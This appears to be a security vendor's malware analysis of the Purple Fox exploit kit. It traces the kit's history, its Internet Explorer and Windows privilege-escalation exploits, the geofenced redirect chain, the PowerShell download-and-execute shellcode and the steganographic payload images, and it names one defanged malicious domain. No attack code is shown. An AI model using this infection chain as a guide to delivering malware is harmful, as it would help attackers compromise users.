Purple Fox is a multi-component malware family that was first documented by Qihoo 360 in September 2018. Originally, it was a trojan that was delivered using the Rig exploit kit (EK). Since then its developers have added new capabilities, including a rootkit component and an exploit kit (also known as Purple Fox EK) to deliver the malware. In mid-2020, Proofpoint suggested that Purple Fox EK may have been developed to replace Rig, plausibly as a cost-saving measure to avoid having to pay another entity to distribute the malware. Exploits against two vulnerabilities, CVE-2020-0674 and CVE-2019-1458, were integrated into Purple Fox at this time. The former exploits a vulnerability in Internet Explorer’s scripting engine to gain code execution, while the latter exploits a vulnerability in win32k.sys to run code with elevated privileges.
In October 2020, SentinelOne described a significant change to Purple Fox’s infection chain and the integration of other privilege escalation exploits. In addition to running several stages of obfuscated PowerShell code to infect systems, Purple Fox’s developers added a feature enabling it to extract other malware stages from image files. Notably, malicious code is hidden inside the images using steganography to avoid detection by web proxies and firewalls.
March 2021 – Purple Fox developers add CVE-2021-26411 exploit
On 12 April 2021, we isolated a Purple Fox EK sample from a HP Sure Click Enterprise customer in the Middle East. Interestingly, the sample attempted to exploit a memory corruption vulnerability in Internet Explorer (CVE-2021-26411) that appeared to be a new addition to Purple Fox’s exploit arsenal. Other Purple Fox EK samples exploiting this vulnerability in the wild were also reported by security researchers.
What is notable about this exploit is that the code run by Purple Fox is very similar to a proof of concept (PoC) published by Enki to the public in mid-March 2021. According to Enki, the PoC script was originally exploited in a social engineering campaign targeting security researchers in January 2021. One possible explanation for their similarity is that the Purple Fox developers simply copied the script from that article. Since the time from PoC to in the wild (ITW) sightings was a couple of weeks (Figure 1), organisations only had a small window to patch before risking compromise by Purple Fox.
Figure 1 – Timeline showing the history of CVE-2021-26411. The PoC-to-ITW time is highlighted in orange.
The user encountered Purple Fox EK after searching for the term “نموذج-تمديد-زيارة-” (“Form-extension-visit-” in Arabic) in Google. They clicked on one of the search results to loislandgraf[.]us, which then led to the exploit via several redirects. During the analysis, we noticed that the exploit is not triggered in every case because geofencing was used to control who is targeted. The attacker’s exact strategy in terms of targeted regions remains unclear. The page could not be accessed from countries such as the USA, UK, France, Germany, the Netherlands and Egypt, whereas Italy, Switzerland, Ireland, Sweden and Japan could trigger the infection chain, although this is not an exhaustive list.
Figure 2 – Purple Fox EK web redirections.
Examining the exploit code shows that it is obfuscated in several stages and encrypted using AES. We were able to recover the source code, which shares many similarities to the PoC code released by Enki. The only major difference between the two is that the shellcode in the Purple Fox exploit script is much longer.
Figure 3 – CVE-2021-26411 exploit shellcode.
The shellcode is straightforward to decode. It runs a PowerShell statement that downloads a file from a remote server and executes it once again with PowerShell. The following diagram shows the process flow of the exploit, which was isolated inside a disposable micro-virtual machine by HP Sure Click Enterprise when the user clicked on the link.
Figure 4 – Process execution flow in HP Sure Controller, showing the exploit that HP Sure Click Enterprise isolated.
The execution of the malware largely corresponds to the infection chain already described by SentinelOne. The script checks whether the user is an administrator and installs the malware using an MSI file if this is the case. If the user is not an administrator, further malware modules are downloaded from the Internet. Steganography now comes into play.
Figure 5 – Purple Fox EK steganographic images (code removed).
PowerShell scripts are extracted from the downloaded images, which are then executed and lead to privilege escalation through one of the integrated exploits:
- CVE-2021-1732 (Nb. The exploit delivered by Purple Fox EK is similar to this publicly available PoC.)
If the exploit is successful, then the MSI and the payload is installed on the client.
Although we have seen fewer sightings of EKs since 2017, the active development of Purple Fox EK suggests this malware delivery method has not gone completely out of fashion. Purple Fox has been around for over two and a half years, during which its developers have regularly extended the EK with new exploits and additional functionality to bypass detection. The addition of a CVE-2021-26411 exploit about a month after the release of the patch does not rule out the possibility that the vulnerability was exploited by the malware before. However, the code similarity between the Enki PoC and the exploit code run by Purple Fox demonstrates how malware developers can easily and quickly adapt public exploit code to their needs. The short time from PoC to real-world sightings once again shows how important it is to patch security vulnerabilities promptly and to monitor and detect anomalies as they occur.
Indicators of Compromise
Images containing code hidden using steganography:
Privilege escalation exploits: